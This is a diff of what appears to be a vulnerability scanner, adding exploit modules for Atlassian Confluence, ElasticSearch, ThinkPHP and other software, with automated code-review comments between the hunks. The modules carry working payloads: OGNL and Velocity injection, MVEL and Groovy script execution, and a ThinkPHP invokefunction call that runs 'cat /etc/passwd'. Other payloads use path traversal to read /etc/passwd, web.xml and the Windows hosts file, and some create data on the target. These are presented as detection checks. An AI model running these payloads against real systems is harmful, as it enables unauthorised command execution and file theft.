'headers': head.merge(self.headers, {}) + }, + { + 'path': 'viewdefaultdecorator.action?decoratorName=file:///C:/Windows/System32/drivers/etc/hosts', + 'data': '', + 'headers': head.merge(self.headers, {}) + }, + { + 'path': 'viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml', + 'data': '', + 'headers': head.merge(self.headers, {}) + }, + # { + # 'path': 
'spaces/viewdefaultdecorator.action?decoratorName=file:///etc/passwd', + # 'data': '', + # 'headers': head.merge(self.headers, {}) + # }, + # { + # 'path': 'spaces/viewdefaultdecorator.action?decoratorName=file:///C:\Windows\System32\drivers\etc\hosts', + # 'data': '', + # 'headers': head.merge(self.headers, {}) + # }, + # { + # 'path': 'spaces/viewdefaultdecorator.action?decoratorName=file:///C:/Windows/System32/drivers/etc/hosts', + # 'data': '', + # 'headers': head.merge(self.headers, {}) + # }, + # { + # 'path': 'spaces/viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml', + # 'data': '', + # 'headers': head.merge(self.headers, {}) + # } + ] + + self.cve_2022_26134_payloads = [ + { + 'path': '%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22echo%20{}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/'.format(self.md), + 'data': '', + 'headers': head.merge(self.headers, {}) + } + ] + + def cve_2019_3396_scan(self, url): + ''' Atlassian Confluence 6.14.2 版本之前存在未经授权的目录遍历漏洞, + 攻击者可以使用 Velocity 模板注入读取任意文件或执行任意命令 + ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'RCE/FileRead' + vul_info['vul_id'] = 'CVE-2019-3396' + vul_info['vul_method'] = 'POST' + + for payload in self.cve_2019_3396_payloads: + path = payload['path'] + data = payload['data'] + headers = payload['headers'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['headers'] = headers + vul_info['target'] = target + + headers['Referer'] = 'http://' + logger.get_domain(url) # * Referer头, Confluence有时会有XSRF检测, 必须是目标的Host才行 + + try: + res = requests.post( + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + 
logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if ((self.md in check.check_res(res.text, self.md)) + or (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text)) + or (('' in res.text) and ('Confluence' in res.text)) + or ('Microsoft Corp' in res.text) + or ('Microsoft TCP/IP for Windows' in res.text) + ): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Method': vul_info['vul_method'], + 'Payload': { + 'Url': url, + 'Path': path, + 'Data': data, + 'Headers': headers + } + } + return results + + def cve_2021_26084_scan(self, url): + ''' Confluence存在一个OGNL注入漏洞, + 允许未经身份验证的攻击者在Confluence服务器或数据中心实例上执行任意代码 + ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'RCE' + vul_info['vul_id'] = 'CVE-2021-26084' + vul_info['vul_method'] = 'POST' + + for payload in self.cve_2021_26084_payloads: + path = payload['path'] + data = payload['data'] + headers = payload['headers'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['headers'] = headers + vul_info['target'] = target + + try: + res = requests.post( + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if (('369630' in res.text) + or (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text)) + # or ('Microsoft Corp' in res.text) + # or ('Microsoft TCP/IP for Windows' in res.text) + ): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], 
vul_info['vul_type'], vul_info['vul_id']], + 'Method': vul_info['vul_method'], + 'Payload': { + 'Url': url, + 'Path': path, + 'Data': data, + 'Headers': headers + } + } + return results + + def cve_2015_8399_scan(self, url): + ''' tlassian Confluence 5.8.17之前版本中存在安全, + 该漏洞源于spaces/viewdefaultdecorator.action和admin/viewdefaultdecorator.action文件 + 没有充分过滤'decoratorName'参数, + 远程攻击者可利用该漏洞读取配置文件 + ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'FileRead' + vul_info['vul_id'] = 'CVE-2015-8399' + vul_info['vul_method'] = 'GET' + + for payload in self.cve_2015_8399_payloads: + path = payload['path'] + data = payload['data'] + headers = payload['headers'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['headers'] = headers + vul_info['target'] = target + + try: + res = requests.get( + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if ((('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text)) + or (('' in res.text) and ('Confluence' in res.text)) + or ('Microsoft Corp' in res.text) + or ('Microsoft TCP/IP for Windows' in res.text) + ): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Method': vul_info['vul_method'], + 'Payload': { + 'Url': url, + 'Path': path + } + } + return results + + def cve_2022_26134_scan(self, url): + ''' 2022年6月2日Atlassian官方发布了一则安全更新, 通告了一个严重且已在野利用的代码执行漏洞, + 攻击者利用这个漏洞即可无需任何条件在Confluence中执行任意命令 + ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'RCE' + vul_info['vul_id'] = 'CVE-2022-26134' + 
vul_info['vul_method'] = 'GET' + + for payload in self.cve_2022_26134_payloads: + path = payload['path'] + data = payload['data'] + headers = payload['headers'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['headers'] = headers + vul_info['target'] = target + + try: + res = requests.get( + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + res_md = "'X-Cmd-Response': '" + self.md + if (res_md in check.check_res(str(res.headers), res_md)): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Method': vul_info['vul_method'], + 'Payload': { + 'Url': url, + 'Path': path + } + } + return results + + def addscan(self, url): + return [ + thread(target=self.cve_2019_3396_scan, url=url), + thread(target=self.cve_2021_26084_scan, url=url), + thread(target=self.cve_2015_8399_scan, url=url), + thread(target=self.cve_2022_26134_scan, url=url) + ] + +confluence = AtlassianConfluence() \ No newline at end of file diff --git a/payloads/Django.py b/payloads/Django.py index fa9ca12..f5bae97 100644 --- a/payloads/Django.py +++ b/payloads/Django.py @@ -363,7 +363,8 @@ def cve_2021_35042_scan(self, url): logger.logging(vul_info, 'Error') return None - if ((('OperationalError' in res.text) or ('DatabaseError' in res.text)) and ('Request information' in res.text)): + if ((('OperationalError' in res.text) or ('DatabaseError' in res.text)) + and ('Request information' in res.text)): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], 
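Review bot: In cve_2019_3396_scan and cve_2015_8399_scan the clause `(('' in res.text) and ('Confluence' in res.text))` is always satisfied by the empty-string membership test, so any response that mentions "Confluence" is reported as a confirmed file read; as rendered here the first literal is empty (it may be an HTML tag lost in extraction), but it needs a concrete marker from the requested file or the branch should go. The Windows path literals such as `'file:///C:\Windows\System32\drivers\etc\hosts'` in the CVE-2019-3396 data and the CVE-2015-8399 path are non-raw strings, so `\W`, `\S`, `\d`, `\e` and `\h` are invalid escape sequences — kept literally today with a warning, but they should be raw strings (`r'...'`) or drop in favour of the forward-slash variant that already follows each of them. In cve_2022_26134_scan, `check.check_res(str(res.headers), res_md)` feeds a marker containing quotes into an unescaped regex and depends on the repr of the headers object; `res.headers.get('X-Cmd-Response') == self.md` is a direct, case-insensitive check. The bare `except:` in each scan method also swallows KeyboardInterrupt, so Ctrl+C during a request never reaches coreScan's stop(); `except Exception:` keeps that working.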
diff --git a/payloads/ElasticSearch.py b/payloads/ElasticSearch.py new file mode 100644 index 0000000..ddcf5d8 --- /dev/null +++ b/payloads/ElasticSearch.py 
@@ -0,0 +1,369 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' + ElasticSearch扫描类: + 1. ElasticSearch 命令执行 + CVE-2014-3120 + Payload: https://vulhub.org/#/environments/elasticsearch/CVE-2014-3120/ + + 2. ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞 + CVE-2015-1427 + Payload: https://vulhub.org/#/environments/elasticsearch/CVE-2015-1427/ + + 3. ElasticSearch 目录穿越 + CVE-2015-3337 + Payload: https://vulhub.org/#/environments/elasticsearch/CVE-2015-3337/ + + 4. ElasticSearch 目录穿越 + CVE-2015-5531 + Payload: https://vulhub.org/#/environments/elasticsearch/CVE-2015-5531/ + +file:///etc/passwd +file:///C:\Windows\System32\drivers\etc\hosts +''' + # Elasticsearch写入webshell + # WooYun-2015-110216 + +from lib.api.dns import dns +from lib.initial.config import config +from lib.tool.md5 import md5, random_md5 +from lib.tool.logger import logger +from lib.tool.thread import thread +from lib.tool import check +from lib.tool import head +from thirdparty import requests +from time import sleep + +class ElasticSearch(): + def __init__(self): + self.timeout = config.get('timeout') + self.headers = config.get('headers') + self.proxies = config.get('proxies') + + self.app_name = 'ElasticSearch' + self.md = md5(self.app_name) + self.cmd = 'echo ' + self.md + + self.cve_2014_3120_payloads = [ + { + 'path': 'website/blog/', + 'data': '{"name": "mouse"}', + 'headers': head.merge(self.headers, {}) + }, + { + 'path': '_search?pretty', + 'data': '''{ + "size": 1, + "query": { + "filtered": { + "query": { + "match_all": { + } + } + } + }, + "script_fields": { + "command": { + "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\"COMMAND\\").getInputStream()).useDelimiter(\\"\\\\\\\\A\\").next();" + } + } +}'''.replace('COMMAND', self.cmd), + 'headers': head.merge(self.headers, {}) + } + ] + + self.cve_2015_1427_payloads = [ + { + 'path': 'website/blog/', + 'data': '{"name": "mouse2"}', + 'headers': head.merge(self.headers, {}) + }, + { + 'path': '_search?pretty', + 
'data': '{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"COMMAND\\").getText()"}}}'.replace('COMMAND', self.cmd), + 'headers': head.merge(self.headers, {}) + } + ] + + self.cve_2015_3337_payloads = [ + { + 'path': '_plugin/head/../../../../../../../../../etc/passwd', + 'data': '', + 'headers': head.merge(self.headers, {}) + }, + ] + + self.cve_2015_5531_payloads = [ + { + 'path': '_snapshot/mouse3', + 'data': '{"type": "fs","settings": {"location": "/usr/share/elasticsearch/repo/mouse3"}}', + 'headers': head.merge(self.headers, {}) + }, + { + 'path': '_snapshot/mouse33', + 'data': '{"type": "fs","settings": {"location": "/usr/share/elasticsearch/repo/mouse3/snapshot-backdata"}}', + 'headers': head.merge(self.headers, {}) + }, + { + 'path': '_snapshot/mouse3/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd', + 'data': '', + 'headers': head.merge(self.headers, {}) + } + ] + + def cve_2014_3120_scan(self, url): + ''' 老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作, + 而MVEL可执行Java代码, 而且没有沙盒, 所以我们可以直接执行任意代码 + ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'RCE' + vul_info['vul_id'] = 'CVE-2014-3120' + vul_info['vul_method'] = 'POST' + + for payload in self.cve_2014_3120_payloads: + path = payload['path'] + data = payload['data'] + headers = payload['headers'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['headers'] = headers + vul_info['target'] = target + + try: + res = requests.post( + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + sleep(1) + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + 
return None + + if (self.md in check.check_res(res.text, self.md)): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Method': vul_info['vul_method'], + 'Payload': { + 'Url': url, + 'Path': path, + 'Data': data + } + } + return results + + def cve_2015_1427_scan(self, url): + ''' ElasticSearch支持使用“在沙盒中的”Groovy语言作为动态脚本, + 但显然官方的工作并没有做好, lupin和tang3分别提出了两种执行命令的方法 + ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'RCE' + vul_info['vul_id'] = 'CVE-2015-1427' + vul_info['vul_method'] = 'POST' + + for payload in self.cve_2015_1427_payloads: + path = payload['path'] + data = payload['data'] + headers = payload['headers'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['headers'] = headers + vul_info['target'] = target + + try: + res = requests.post( + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + sleep(1) + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if (self.md in check.check_res(res.text, self.md)): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Method': vul_info['vul_method'], + 'Payload': { + 'Url': url, + 'Path': path, + 'Data': data + } + } + return results + + def cve_2015_3337_scan(self, url): + ''' 在安装了具有“site”功能的插件以后, 插件目录使用../即可向上跳转, + 导致目录穿越漏洞, 可读取任意文件, 没有安装任意插件的elasticsearch不受影响 + ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'FileRead' + vul_info['vul_id'] = 'CVE-2015-3337' + vul_info['vul_method'] = 'GET' + + for payload in self.cve_2015_3337_payloads: + path = payload['path'] + data = 
payload['data'] + headers = payload['headers'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['headers'] = headers + vul_info['target'] = target + + try: + res = requests.get( + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if (('/sbin/nologin' in res.text) + or ('root:x:0:0:root' in res.text)): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Method': vul_info['vul_method'], + 'Payload': { + 'Url': url, + 'Path': path + } + } + return results + + def cve_2015_5531_scan(self, url): + ''' elasticsearch 1.5.1及以前, 无需任何配置即可触发该漏洞; + 之后的新版, 配置文件elasticsearch.yml中必须存在path.repo, 该配置值为一个目录, 且该目录必须可写, + 等于限制了备份仓库的根位置, 不配置该值, 默认不启动这个功能 + ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'FileRead' + vul_info['vul_id'] = 'CVE-2015-5531' + # vul_info['vul_method'] = 'PUT/GET' + vul_info['vul_method'] = 'GET' + + for payload in range(len(self.cve_2015_5531_payloads)): + # path = payload['path'] + # data = payload['data'] + # headers = payload['headers'] + + path = self.cve_2015_5531_payloads[payload]['path'] + data = self.cve_2015_5531_payloads[payload]['data'] + headers = self.cve_2015_5531_payloads[payload]['headers'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['headers'] = headers + vul_info['target'] = target + + try: + if (payload in [0, 1]): + res = requests.put( + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, 
res.status_code, res) # * LOG + continue + + # elif payload == 2 + sleep(0.5) + res = requests.get( + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if (res.status_code == 400 + and ('114, 111, 111, 116' in res.text) + and ('Failed to derive' in res.text) + ): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Method': vul_info['vul_method'], + 'Payload': { + 'Url': url, + 'Path': path, + 'Prompt': 'ASCII decimal encode' + } + } + return results + + def addscan(self, url): + return [ + thread(target=self.cve_2014_3120_scan, url=url), + thread(target=self.cve_2015_1427_scan, url=url), + thread(target=self.cve_2015_3337_scan, url=url), + thread(target=self.cve_2015_5531_scan, url=url) + ] + +elasticsearch = ElasticSearch() \ No newline at end of file diff --git a/payloads/F5BIGIP.py b/payloads/F5BIGIP.py index 620a9ec..b71fbac 100644 --- a/payloads/F5BIGIP.py +++ b/payloads/F5BIGIP.py 
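Review bot: Three of the four scans in this new file change state on the target before they check anything — `cve_2014_3120_scan` and `cve_2015_1427_scan` first POST a document to `website/blog/`, and `cve_2015_5531_scan` first PUTs two snapshot repositories (`_snapshot/mouse3`, `_snapshot/mouse33`) — yet neither the module docstring nor the method docstrings mention it; each docstring should state what gets written so an operator knows what to clean up and what a defender will see in the audit trail. The constructor keeps `config.get('headers')` without the `.copy()` that the demo2.py template uses, so if `head.merge` mutates its first argument the shared config headers would be altered for every other scanner — worth confirming against head.py. `dns` and `random_md5` are imported but never referenced in this file, and the ThinkPHP.py import hunk adds `dns`, `random_md5` and `sleep` with no use in its visible hunks either. Finally, the bare `except:` after the `requests.ConnectionError` handler in every scan (here, in the new ThinkPHP scan and in the demo2.py template) also swallows `KeyboardInterrupt`/`SystemExit`; `except Exception:` keeps the 'Error' logging while letting Ctrl-C stop the scanner.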
@@ -107,7 +107,14 @@ def cve_2020_5902_scan(self, url): logger.logging(vul_info, 'Error') return None - if (('encrypted-password' in res.text) or ('partition-access' in res.text) or (('"output": "' in res.text) and ('"error": "",' in res.text)) or ('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text) or ('Microsoft Corp' in res.text) or ('Microsoft TCP/IP for Windows' in res.text)): + if (('encrypted-password' in res.text) + or ('partition-access' in res.text) + or (('"output": "' in res.text) and ('"error": "",' in res.text)) + or ('/sbin/nologin' in res.text) + or ('root:x:0:0:root' in res.text) + or ('Microsoft Corp' in res.text) + or ('Microsoft TCP/IP for Windows' in res.text) + ): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], @@ -167,7 +174,9 @@ def cve_2022_1388_scan(self, url): logger.logging(vul_info, 'Error') return None - if (('commandResult' in res.text) and (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text))): + if (('commandResult' in res.text) + and (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text)) + ): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], diff --git a/payloads/Fastjson.py b/payloads/Fastjson.py index 5d6b5fa..212eff6 100644 --- a/payloads/Fastjson.py +++ b/payloads/Fastjson.py @@ -130,7 +130,7 @@ def cve_2017_18349_scan(self, url): vul_info = {} vul_info['app_name'] = self.app_name vul_info['vul_type'] = 'unSerialize' - vul_info['vul_id'] = 'CVE-2017-18349' + vul_info['vul_id'] = 'CNVD-2017-02833' vul_info['vul_method'] = 'POST' vul_info['headers'] = { 'Content-Type': 'application/json' diff --git a/payloads/Spring.py b/payloads/Spring.py index 300d982..819bc71 100644 --- a/payloads/Spring.py +++ b/payloads/Spring.py 
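Review bot: In the Fastjson hunk the reported identifier becomes `CNVD-2017-02833` while the method keeps the name `cve_2017_18349_scan` (visible in the hunk header), so the same finding is now referred to by two different ids with nothing tying them together. If both ids describe the same issue, a comment on the assignment, `vul_info['vul_id'] = 'CNVD-2017-02833'  # also tracked as CVE-2017-18349; method name kept`, or a rename of the method together with its `addscan` entry, would keep the code and the report consistent. The enclosing function continues outside the hunk.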
@@ -306,7 +306,11 @@ def cve_2020_5410_scan(self, url): logger.logging(vul_info, 'Error') return None - if (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text) or ('Microsoft Corp' in res.text) or ('Microsoft TCP/IP for Windows' in res.text)): + if (('/sbin/nologin' in res.text) + or ('root:x:0:0:root' in res.text) + or ('Microsoft Corp' in res.text) + or ('Microsoft TCP/IP for Windows' in res.text) + ): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], @@ -446,7 +450,9 @@ def cve_2022_22947_scan(self, url): ) logger.logging(vul_info, res3.status_code, res3) # * LOG - if ((res3.status_code == 200) and (('/sbin/nologin' in res3.text) or ('root:x:0:0:root' in res3.text))): + if ((res3.status_code == 200) + and (('/sbin/nologin' in res3.text) + or ('root:x:0:0:root' in res3.text))): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], @@ -474,7 +480,7 @@ def addscan(self, url): return [ thread(target=self.cve_2020_5410_scan, url=url), thread(target=self.cve_2021_21234_scan, url=url), - # thread(target=self.cve_2022_22965_scan, url=url), + thread(target=self.cve_2022_22965_scan, url=url), thread(target=self.cve_2022_22963_scan, url=url), thread(target=self.cve_2022_22947_scan, url=url) ] diff --git a/payloads/ThinkPHP.py b/payloads/ThinkPHP.py index 5234418..6e3e64e 100644 --- a/payloads/ThinkPHP.py +++ b/payloads/ThinkPHP.py 
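Review bot: The `addscan` hunk re-enables `thread(target=self.cve_2022_22965_scan, url=url)`, which was deliberately commented out before, but neither the hunk nor the commit subject ('20220616-v1.0.9') records why it was disabled or what changed to make it safe to run by default. A one-line comment above the entry, e.g. `# re-enabled in v1.0.9: <reason>`, would spare the next reader the guesswork, and if the check was parked because it leaves artifacts on the target or produced false positives, the scan's docstring (outside this hunk) should say so. The two earlier Spring hunks only re-wrap conditions and need nothing.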
@@ -19,15 +19,22 @@ 暂无编号 Payload: https://vulhub.org/#/environments/thinkphp/in-sqlinjection/ + 5. ThinkPHP5.x 远程代码执行 + CVE-2018-1002015 + Payload: https://www.cnblogs.com/defyou/p/15762860.html + 其它奇奇怪怪的Payload: https://baizesec.github.io/ ''' +from lib.api.dns import dns from lib.initial.config import config -from lib.tool.md5 import md5 +from lib.tool.md5 import md5, random_md5 from lib.tool.logger import logger from lib.tool.thread import thread from lib.tool import check +from lib.tool import head from thirdparty import requests +from time import sleep class ThinkPHP(): def __init__(self): @@ -79,6 +86,19 @@ def __init__(self): } ] + self.cve_2018_1002015_payloads = [ + { + 'path': 'index.php?s=index/\\think\\Container/invokefunction', + 'data': 'function=call_user_func_array&vars[0]=system&vars[1][]=cat /etc/passwd', + 'headers': head.merge(self.headers, {}) + }, + { + 'path': 'index.php?s=index/\\think\\Container/invokefunction', + 'data': 'function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1', + 'headers': head.merge(self.headers, {}) + } + ] + # * 以下payload没有找到测试环境, 所以没写poc, 哪个好心人提供一下环境QAQ self.thinkphp_5_options_sqlinject_payloads = [ { @@ -158,7 +178,10 @@ def cnvd_2018_24942_scan(self, url): return None # * 判断扫描结果 - if (self.md in check.check_res(res.text, self.md)) or (('PHP Version' in res.text) and ('PHP License' in res.text)): + if (self.md in check.check_res(res.text, self.md) + or (('PHP Version' in res.text) + and ('PHP License' in res.text)) + ): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], @@ -212,7 +235,7 @@ def cnnvd_201901_445_scan(self, url): return None # * 判断扫描结果 - if self.md in check.check_res(res.text, self.md): + if (self.md in check.check_res(res.text, self.md)): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], 
@@ -334,12 +357,72 @@ def thinkphp_5_ids_sqlinject_scan(self, url): } return results + def cve_2018_1002015_scan(self, url): + ''' ThinkPHP 5.0.23及5.1.31以下版本RCE + ThinkPHP 5.0.x版本和5.1.x版本中存在远程代码执行漏洞, + 该漏洞源于ThinkPHP在获取控制器名时未对用户提交的参数进行严格的过滤, + 远程攻击者可通过输入字符 \ 的方式调用任意方法利用该漏洞执行代码 + ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'RCE' + vul_info['vul_id'] = 'CVE-2018-1002015' + vul_info['vul_method'] = 'POST' + + for payload in self.cve_2018_1002015_payloads: + path = payload['path'] + data = payload['data'] + headers = payload['headers'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['headers'] = headers + vul_info['target'] = target + + try: + res = requests.post( + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if (('root:x:0:0:root' in res.text) + or (('PHP Version' in res.text) + and ('PHP License' in res.text)) + ): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Method': vul_info['vul_method'], + 'Payload': { + 'Url': url, + 'Path': path, + 'Data': data + } + } + return results + def addscan(self, url): return [ thread(target=self.cnvd_2018_24942_scan, url=url), thread(target=self.cnnvd_201901_445_scan, url=url), thread(target=self.thinkphp_2_x_rce_scan, url=url), - thread(target=self.thinkphp_5_ids_sqlinject_scan, url=url) + thread(target=self.thinkphp_5_ids_sqlinject_scan, url=url), + thread(target=self.cve_2018_1002015_scan, url=url) ] thinkphp = ThinkPHP() \ No newline at end of file 
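Review bot: `cve_2018_1002015_scan` calls `requests.post(...)` without `allow_redirects=False`, unlike every other scan added in this commit (the ElasticSearch and AtlassianConfluence ones pass it explicitly), so a target that answers with a redirect is followed and the `res.status_code`/`res.text` that get logged and matched belong to the redirect destination rather than to the probed path. Adding `allow_redirects=False` after `verify=False` keeps result attribution consistent with the rest of the project. The docstring would also benefit from stating that the first payload executes a command on the target and the match is on its output, so operators understand the check is not passive.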
diff --git a/payloads/demo2.py b/payloads/demo2.py new file mode 100644 index 0000000..cd55e3c --- /dev/null +++ b/payloads/demo2.py 
@@ -0,0 +1,134 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' + XXXXX扫描类: + XXXXX 未开启强制路由RCE + CNVD-2018-24942 +file:///etc/passwd +file:///C:\Windows\System32\drivers\etc\hosts +file:///C:/Windows/System32/drivers/etc/hosts +''' + +from lib.api.dns import dns +from lib.initial.config import config +from lib.tool.md5 import md5, random_md5 +from lib.tool.logger import logger +from lib.tool.thread import thread +from lib.tool import check +from lib.tool import head +from thirdparty import requests +from time import sleep + +class 1(): # ! 1: 类名(例如 ThinkPHP) + ''' 标有数字的地方都需要自己填写 ''' + def __init__(self): + self.timeout = config.get('timeout') + self.headers = config.get('headers').copy() + self.proxies = config.get('proxies') + + self.app_name = '2' # ! 2: 漏洞框架/应用程序/CMS等(例如 thinkphp) + self.md = md5(self.app_name) + self.cmd = 'echo ' + self.md + + self.3_payloads = [ # ! 3: Payload的名称(例如 cnvd_2018_24942_payloads) + { + 'path': '4', # ! 4: url路径(例如/admin/login) + 'data': '5', # ! 5: POST数据, 没有的话可以不写 + 'headers': head.merge(self.headers, {}) # ! 6: Headers请求头, 填在{}里面, 字典形式; 没有的话可以不写, 不写的话将使用默认请求头; 如果存在同名的请求头, 则会覆盖掉原来的 + }, + ] + + def 7_scan(self, url): # ! 7: POC的名称(例如 cnvd_2018_24942_scan) + ''' ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = '8' # ! 8: 漏洞类型(例如 RCE) + vul_info['vul_id'] = '9' # ! 9: 漏洞编号(例如 CNVD-2018-24942) + vul_info['vul_method'] = '10' # ! 10: 请求方式(例如 GET) + + for payload in range(len(self.3_payloads)): # ! 3: 同上, Payload的名称 + path = self.3_payloads[payload]['path'] # ! 3: 同上, Payload的名称 + data = self.3_payloads[payload]['data'] # ! 3: 同上, Payload的名称 + headers = self.3_payloads[payload]['headers'] # ! 3: 同上, Payload的名称 + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['headers'] = headers + vul_info['target'] = target + + try: + if payload == 0: # * 当payload为第1个时, 执行xxx操作 + res = requests.11( # ! 
